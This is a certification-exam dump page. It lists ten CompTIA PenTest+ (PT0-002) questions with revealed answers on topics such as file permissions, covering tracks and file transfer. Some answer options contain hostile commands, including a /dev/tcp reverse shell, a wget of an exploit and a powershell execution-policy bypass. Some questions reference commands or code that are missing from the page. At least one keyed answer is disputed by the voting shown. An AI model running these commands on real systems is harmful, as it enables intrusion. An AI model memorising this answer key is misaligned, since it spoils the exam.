Welcome to ExamTopics
ExamTopics Logo
- Expert Verified, Online, Free.
 

CompTIA PT0-002 Exam Actual Questions

The questions for PT0-002 were last updated on July 4, 2024.
  • Viewing page 1 out of 33 pages.
  • Viewing questions 1-10 out of 326 questions

Topic 1 - Single Topic

Question #1 Topic 1

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

  • A. chmod u+x script.sh
  • B. chmod u+e script.sh
  • C. chmod o+e script.sh
  • D. chmod o+x script.sh
Reveal Solution Hide Solution   Discussion   14

Correct Answer: A 🗳️
Reference:
https://newbedev.com/chmod-u-x-versus-chmod-x

Question #2 Topic 1

A penetration tester gains access to a system and establishes persistence, and then run the following commands:

Which of the following actions is the tester MOST likely performing?

  • A. Redirecting Bash history to /dev/null
  • B. Making a copy of the user's Bash history to further enumeration
  • C. Covering tracks by clearing the Bash history
  • D. Making decoy files on the system to confuse incident responders
Reveal Solution Hide Solution   Discussion   9

Correct Answer: C 🗳️
Reference:
https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover- your-tracks-remain-undetected-0244768/

Question #3 Topic 1

A compliance-based penetration test is primarily concerned with:

  • A. obtaining PII from the protected network.
  • B. bypassing protection on edge devices.
  • C. determining the efficacy of a specific set of security standards.
  • D. obtaining specific information from the protected network.
Reveal Solution Hide Solution   Discussion   3

Correct Answer: C 🗳️

Question #4 Topic 1

A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.
Which of the following would the tester MOST likely describe as a benefit of the framework?

  • A. Understanding the tactics of a security intrusion can help disrupt them.
  • B. Scripts that are part of the framework can be imported directly into SIEM tools.
  • C. The methodology can be used to estimate the cost of an incident better.
  • D. The framework is static and ensures stability of a security program over time.
Reveal Solution Hide Solution   Discussion   3

Correct Answer: A 🗳️
Reference:
https://attack.mitre.org/

Question #5 Topic 1

Which of the following BEST describe the OWASP Top 10? (Choose two.)

  • A. The most critical risks of web applications
  • B. A list of all the risks of web applications
  • C. The risks defined in order of importance
  • D. A web-application security standard
  • E. A risk-governance and compliance framework
  • F. A checklist of Apache vulnerabilities
Reveal Solution Hide Solution   Discussion   2

Correct Answer: AC 🗳️
Reference:
https://www.synopsys.com/glossary/what-is-owasp-top-10.html

Question #6 Topic 1

A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  • A. Edit the discovered file with one line of code for remote callback.
  • B. Download .pl files and look for usernames and passwords.
  • C. Edit the smb.conf file and upload it to the server.
  • D. Download the smb.conf file and look at configurations.
Reveal Solution Hide Solution   Discussion   13

Correct Answer: C 🗳️

Question #7 Topic 1

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

  • A. Whether sensitive client data is publicly accessible
  • B. Whether the connection between the cloud and the client is secure
  • C. Whether the client's employees are trained properly to use the platform
  • D. Whether the cloud applications were developed using a secure SDLC
Reveal Solution Hide Solution   Discussion   14

Correct Answer: A 🗳️

Question #8 Topic 1

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  • A. nc 10.10.51.50 9891 < exploit
  • B. powershell -exec bypass -f \\10.10.51.50\9891
  • C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
  • D. wget 10.10.51.50:9891/exploit
Reveal Solution Hide Solution   Discussion   7

Correct Answer: D 🗳️

Question #9 Topic 1

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

Which of the following commands should the penetration tester run post-engagement?

  • A. grep -v apache ~/bash_history > ~/.bash_history
  • B. rm -rf /tmp/apache
  • C. chmod 600 /tmp/apache
  • D. taskkill /IM ג€apacheג€ /F
Reveal Solution Hide Solution   Discussion   10

Correct Answer: B 🗳️

Question #10 Topic 1

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

  • A. Executive summary of the penetration-testing methods used
  • B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
  • C. Quantitative impact assessments given a successful software compromise
  • D. Code context for instances of unsafe typecasting operations
Reveal Solution Hide Solution   Discussion   11

Correct Answer: C 🗳️

Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
Loading ...
ex Want to SAVE BIG on Certification Exam Prep?
close
ex Unlock All Exams with ExamTopics Pro 75% Off
  • arrow Choose From 1000+ Exams
  • arrow Access to 10 Exams per Month
  • arrow PDF Format Available
  • arrow Inline Discussions
  • arrow No Captcha/Robot Checks
Limited Time Offer
Ends in